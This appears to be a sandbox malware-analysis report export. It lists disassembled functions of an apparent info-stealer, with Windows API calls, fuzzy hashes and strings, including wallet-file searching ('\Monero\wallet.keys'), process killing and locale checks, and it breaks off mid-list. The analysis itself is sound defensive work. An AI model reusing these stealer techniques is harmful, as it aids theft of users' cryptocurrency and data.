String ID: FRW/$G#W'$\1^5$iuo${5Jy$~Ew$/W$\}R$pgn
API String ID: 0-3325242997
Opcode ID: 2fdf5150327526193255955257ee123c037e43d6374136a90052bbf405c8dbac
Instruction ID: 88e05d34bf5cf726b43d32522bf0517d19a57e63d80c5e2a560c2aa1b5e00908
Opcode Fuzzy Hash: 2fdf5150327526193255955257ee123c037e43d6374136a90052bbf405c8dbac
Instruction Fuzzy Hash: 01B2E4F290C204AFE304AF29EC8567AFBE5EF94720F1A493DEAC583340E63558548797

Function 00E298E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E29905
Process32First.KERNEL32(00E19FDE,00000128), ref: 00E29919
Process32Next.KERNEL32(00E19FDE,00000128), ref: 00E2992E
StrCmpCA.SHLWAPI(?,00E19FDE), ref: 00E29943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2997A
CloseHandle.KERNEL32(00000000), ref: 00E29987
CloseHandle.KERNEL32(00E19FDE), ref: 00E29993

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: f0d2bebc4fd7b38b59237fa29e0415131c529d6be85c0f0d32e3397944231e9f
Instruction ID: 5f5ea97308e1ecbf42021d414aef119a0bd6eadb9c58f21db002e1b53a5af718
Opcode Fuzzy Hash: f0d2bebc4fd7b38b59237fa29e0415131c529d6be85c0f0d32e3397944231e9f
Instruction Fuzzy Hash: 97111F75900318ABCB24DFA5EC48BDDB7B9BB88700F0055CCF545AA244D7799A84CF90

Function 00E27D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

GetKeyboardLayoutList.USER32(00000000,00000000,00E305B7), ref: 00E27D71
LocalAlloc.KERNEL32(00000040,?), ref: 00E27D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00E27D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E27DF2
LocalFree.KERNEL32(00000000), ref: 00E27EB2

Strings

/ , xrefs: 00E27E0F

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: d1e744e0f8231fea1779e944f8c26beeea4de76f8c8843cfa361b97e7c959119
Instruction ID: 6381a3acdc7f8fb860bb4f52b2d2c7682bfd5357ba5e00c63ffdc2498d350e4b
Opcode Fuzzy Hash: d1e744e0f8231fea1779e944f8c26beeea4de76f8c8843cfa361b97e7c959119
Instruction Fuzzy Hash: E3413F71940228ABCB24DB94EC99BEEB7B5FF44700F2451D9E10A76281DB746F84CFA1

Function 00E1E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E30D79), ref: 00E1E5A2
StrCmpCA.SHLWAPI(?,00E315F0), ref: 00E1E5F2
StrCmpCA.SHLWAPI(?,00E315F4), ref: 00E1E608
FindNextFileA.KERNEL32(000000FF,?), ref: 00E1ECDF

Strings

\*.*, xrefs: 00E1E54D

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 0d7e40bf4a4b4eb046a83691bf7d3da91fcfbe0755735af28e071f07f521ef41
Instruction ID: 6b37db10d4bf60472e05af5c2981a1f73e396f8bc4eec7243fecc976b42b4243
Opcode Fuzzy Hash: 0d7e40bf4a4b4eb046a83691bf7d3da91fcfbe0755735af28e071f07f521ef41
Instruction Fuzzy Hash: 7012F172A101289BCB14FB60EDA7EED73B9AF54300F4855F9B50A76191EE306F48CB52

Function 0126316C Relevance: 9.2, Strings: 6, Instructions: 1664COMMON

Download Yara Rule

Strings

Q_?, xrefs: 01263B93
f+g, xrefs: 01263DFB
e'o, xrefs: 0126336B
Kc+K, xrefs: 01263256
$4vv, xrefs: 012643A2
J~6, xrefs: 012635D1

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: f+g$$4vv$Kc+K$e'o$J~6$Q_?
API String ID: 0-3715263431
Opcode ID: c95f58816efa3882d7191cedc1a6bc773647f4cdbbf489d8d3791c403b808c97
Instruction ID: 8504b460657a7d3c93f2dfa671e41b572975603258efa4f419ebdc2d5fd38f9a
Opcode Fuzzy Hash: c95f58816efa3882d7191cedc1a6bc773647f4cdbbf489d8d3791c403b808c97
Instruction Fuzzy Hash: 00B216F3A082009FE3046E2DDC8567AFBE5EFD4760F1A4A3DE6C4C7744EA3598418696

Function 0126B9C1 Relevance: 9.1, Strings: 6, Instructions: 1607COMMON

Download Yara Rule

Strings

]?, xrefs: 0126BCE8
hW?, xrefs: 0126CC98
/M), xrefs: 0126BAAE
sOW, xrefs: 0126BA34
.kt/, xrefs: 0126B9DE
a:OO, xrefs: 0126CBE3

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ]?$.kt/$/M)$a:OO$hW?$sOW
API String ID: 0-1086714760
Opcode ID: 2c4fb005fadb467ac4c1ab0ac4bfdda04bea3e04a037e27146f0a70d7a5fd4f0
Instruction ID: d6fdb2d6412d7c279316141d71b684c9dfffc5baaa66faab2c60aaafd439bb98
Opcode Fuzzy Hash: 2c4fb005fadb467ac4c1ab0ac4bfdda04bea3e04a037e27146f0a70d7a5fd4f0
Instruction Fuzzy Hash: C5B207F3A0C2049FE304AE2DEC8567AB7E9EF94720F16493DE6C4C7344EA3598158697

Function 00E1A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F

Strings

>O, xrefs: 00E1A224, 00E1A231, 00E1A249, 00E1A268, 00E1A234, 00E1A26B

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O
API String ID: 4291131564-1870091082
Opcode ID: 72daca3b4fc441d552e6a0e1652195e170c3ea3af9a80ac0dbf322742135a627
Instruction ID: aca274c12e14cb7ba7c703d3c3ef8a996e0cf531680423397e9bc71e001736d5
Opcode Fuzzy Hash: 72daca3b4fc441d552e6a0e1652195e170c3ea3af9a80ac0dbf322742135a627
Instruction Fuzzy Hash: 2811A474641308AFEB11CF64C895FAA77B5EB89B14F208458FD159F390C7B6A941CB90

Function 01273E2D Relevance: 7.9, Strings: 5, Instructions: 1677COMMON

Download Yara Rule

Strings

-;], xrefs: 01273F26
Yg{, xrefs: 01274234
i^BO, xrefs: 01273ED1
?wnM, xrefs: 0127517B
`];C, xrefs: 01274081

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: -;]$?wnM$Yg{$`];C$i^BO
API String ID: 0-300632929
Opcode ID: 6e5ae41f4a83898f0de0b14289247b8029b399e3fba66b739aea0b3e41856dd8
Instruction ID: 157db8aec894eaeeb9c1038e9f73a96638dd1deda7509ff44c3018ccd49026d1
Opcode Fuzzy Hash: 6e5ae41f4a83898f0de0b14289247b8029b399e3fba66b739aea0b3e41856dd8
Instruction Fuzzy Hash: F5B21AF3A0C2049FE3046E2DEC8567ABBE5EF94720F1A493DEAC4C7744EA3558058697

Function 0125DF75 Relevance: 7.8, Strings: 5, Instructions: 1598COMMON

Download Yara Rule

Strings

I_=, xrefs: 0125E586
iym, xrefs: 0125E025
!y6, xrefs: 0125E4CF
/[?, xrefs: 0125E4F3
xj{S, xrefs: 0125ED92

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !y6$/[?$I_=$iym$xj{S
API String ID: 0-2239081516
Opcode ID: 79b3dc346d33624e2fefe6375c89c12824f13e5f5e9422f3fb9109e63b605780
Instruction ID: b7502fa32ddcfdf94abd869d4c41f794b3e4f413681e367ee54c244e00e7dbe2
Opcode Fuzzy Hash: 79b3dc346d33624e2fefe6375c89c12824f13e5f5e9422f3fb9109e63b605780
Instruction Fuzzy Hash: 5DB207F3A0C204AFE7046E29EC8567AFBE9EF94620F1A493DE6C4C3744E67558018797

Function 00E7F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON

Download Yara Rule

Strings

\u, xrefs: 00E7FA93
{, xrefs: 00E7F9AA
}, xrefs: 00E7FA8F
}, xrefs: 00E7F99F
{, xrefs: 00E7FA9A
\u, xrefs: 00E7F9A3

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: \u$\u${${$}$}
API String ID: 0-582841131
Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction ID: 528c8c927a71e2d0a0fa49f87b71ca9e423c297378a9f504e57d622b3ebd2f91
Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction Fuzzy Hash: 73418212D19BD5C5CB058B7444A02EEBFB22FD6210F6D82DAC4DD1F782C774414AD3A5

Function 00E1C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C97C
lstrcat.KERNEL32(?,00E30B47), ref: 00E1CA43
lstrcat.KERNEL32(?,00E30B4B), ref: 00E1CA57
lstrcat.KERNEL32(?,00E30B4E), ref: 00E1CA78

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID:
API String ID: 189259977-0
Opcode ID: 2b6f392498fc5a293a7599aed10dd0ef8503afd5cf676def1e91b956019ef63f
Instruction ID: 3944bf492a1d221e6e79b93bd0296654144afc77d9dd24f0c483a05fe941af81
Opcode Fuzzy Hash: 2b6f392498fc5a293a7599aed10dd0ef8503afd5cf676def1e91b956019ef63f
Instruction Fuzzy Hash: 48415E7490421EDBDB20CFA4DD89BEEBBB8AF48704F1045A8F509A6280D7755A84CF91

Function 00E26BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00E26C0C
sscanf.NTDLL ref: 00E26C39
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E26C52
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E26C60
ExitProcess.KERNEL32 ref: 00E26C7A

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
